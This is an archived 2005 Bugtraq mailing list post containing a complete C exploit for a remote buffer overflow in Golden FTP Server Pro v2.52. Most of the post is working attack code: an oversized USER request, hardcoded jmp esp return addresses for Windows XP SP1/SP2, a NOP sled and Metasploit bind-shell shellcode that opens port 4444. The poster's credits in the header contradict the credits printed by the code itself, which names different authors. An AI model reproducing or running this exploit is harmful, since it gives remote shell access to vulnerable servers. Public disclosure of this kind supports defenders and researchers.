lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 30 Apr 2005 15:03:17 +0000 From: "mohamed amhemed" <rodhedor@...mail.com> To: bugtraq@...urityfocus.com Subject: Golden FTP Server Pro Remote Buffer Overflow Exploit Golden FTP Server Pro Remote Buffer Overflow Exploit Bug Discovered by rod hedor (http://lezr.com) Exploit coded By lezr hack Web: lezr.com E-Mail: rodhedor@...mail.com Usage:exploit <targetOs> <targetIp> / / Vulnerable Versions: Golden FTP Server Pro v2.52 Exploit: Run the exploit against the server. Afterward, right click on the Golden FTP Server Pro icon in the Windows tray and click Statistic. It will open bind shell on port 4444 / #include <windows.h> #include <stdio.h> #pragma comment(lib, "ws2_32.lib") char userreq[] = "USER " "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; char *target[]= //return addr { "\xFC\x18\xD7\x77", //WinXp Sp1 Eng - jmp esp addr "\xBF\xAC\xDA\x77" //WinXp Sp2 Eng - jmp esp addr }; char shellcode[] = /* win32_bind - EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub http://metasploit.com */ "\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x82" "\x2a\x64\x94\x83\xeb\xfc\xe2\xf4\x7e\x40\x8f\xdb\x6a\xd3\x9b\x6b" "\x7d\x4a\xef\xf8\xa6\x0e\xef\xd1\xbe\xa1\x18\x91\xfa\x2b\x8b\x1f" "\xcd\x32\xef\xcb\xa2\x2b\x8f\x77\xb2\x63\xef\xa0\x09\x2b\x8a\xa5" "\x42\xb3\xc8\x10\x42\x5e\x63\x55\x48\x27\x65\x56\x69\xde\x5f\xc0" "\xa6\x02\x11\x77\x09\x75\x40\x95\x69\x4c\xef\x98\xc9\xa1\x3b\x88" "\x83\xc1\x67\xb8\x09\xa3\x08\xb0\x9e\x4b\xa7\xa5\x42\x4e\xef\xd4" "\xb2\xa1\x24\x98\x09\x5a\x78\x39\x09\x6a\x6c\xca\xea\xa4\x2a\x9a" "\x6e\x7a\x9b\x42\xb3\xf1\x02\xc7\xe4\x42\x57\xa6\xea\x5d\x17\xa6" "\xdd\x7e\x9b\x44\xea\xe1\x89\x68\xb9\x7a\x9b\x42\xdd\xa3\x81\xf2" "\x03\xc7\x6c\x96\xd7\x40\x66\x6b\x52\x42\xbd\x9d\x77\x87\x33\x6b" "\x54\x79\x37\xc7\xd1\x79\x27\xc7\xc1\x79\x9b\x44\xe4\x42\x75\xc8" "\xe4\x79\xed\x75\x17\x42\xc0\x8e\xf2\xed\x33\x6b\x54\x40\x74\xc5" "\xd7\xd5\xb4\xfc\x26\x87\x4a\x7d\xd5\xd5\xb2\xc7\xd7\xd5\xb4\xfc" "\x67\x63\xe2\xdd\xd5\xd5\xb2\xc4\xd6\x7e\x31\x6b\x52\xb9\x0c\x73" "\xfb\xec\x1d\xc3\x7d\xfc\x31\x6b\x52\x4c\x0e\xf0\xe4\x42\x07\xf9" "\x0b\xcf\x0e\xc4\xdb\x03\xa8\x1d\x65\x40\x20\x1d\x60\x1b\xa4\x67" "\x28\xd4\x26\xb9\x7c\x68\x48\x07\x0f\x50\x5c\x3f\x29\x81\x0c\xe6" "\x7c\x99\x72\x6b\xf7\x6e\x9b\x42\xd9\x7d\x36\xc5\xd3\x7b\x0e\x95" "\xd3\x7b\x31\xc5\x7d\xfa\x0c\x39\x5b\x2f\xaa\xc7\x7d\xfc\x0e\x6b" "\x7d\x1d\x9b\x44\x09\x7d\x98\x17\x46\x4e\x9b\x42\xd0\xd5\xb4\xfc" "\x72\xa0\x60\xcb\xd1\xd5\xb2\x6b\x52\x2a\x64\x94"; char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90"; char passreq[] = "PASS \r\n"; void main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested; struct hostent *pTarget; struct sockaddr_in sock; SOCKET mysocket; char rec[1024]; if (argc < 3) { printf("\r\nGolden FTP Server Pro Remote Buffer Overflow Exploit\r\n",argv[0]); printf("Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)\r\n"); printf("Exploit coded By ATmaCA\r\n"); printf("Web: atmacasoft.com && spyinstructors.com\r\n"); printf("Credit to kozan and metasploit\r\n"); printf("Usage:\r\nexploit <targetOs> <targetIp>\r\n\r\n",argv[0]); printf("Targets:\n"); printf("1 - WinXP SP1 english\n"); printf("2 - WinXP SP2 english\n"); printf("Example:exploit 2 127.0.0.1\n"); return; } int targetnum = atoi(argv[1]) - 1; char *evilbuf = (char*)malloc(sizeof(userreq)+sizeof(shellcode)+sizeof(nops) +sizeof(passreq)+7); strcpy(evilbuf,userreq); strcat(evilbuf,target[targetnum]); strcat(evilbuf,nops); strcat(evilbuf,shellcode); strcat(evilbuf,"\r\n"); strcat(evilbuf,passreq); //printf("%s",evilbuf); wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return; mysocket = socket(AF_INET, SOCK_STREAM, 0); if(mysocket==INVALID_SOCKET){ printf("Socket error!\r\n"); exit(1); } printf("Resolving Hostnames...\n"); if ((pTarget = gethostbyname(argv[2])) == NULL){ printf("Resolve of %s failed\n", argv[1]); exit(1); } memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons(21); printf("Connecting...\n"); if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){ printf("Couldn't connect to host.\n"); exit(1); } printf("Connected!...\n"); printf("Waiting for welcome message...\n"); Sleep(10); recv(mysocket,rec,1024,0); printf("Sending evil request...\n"); if (send(mysocket,evilbuf, strlen(evilbuf)+1, 0) == -1){ printf("Error Sending evil request.\r\n"); closesocket(mysocket); exit(1); } Sleep(10); printf("Success.\n"); closesocket(mysocket); WSACleanup(); } // راندفو انت ح ث ا؛؛؛ ل ة _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Powered by blists - more mailing lists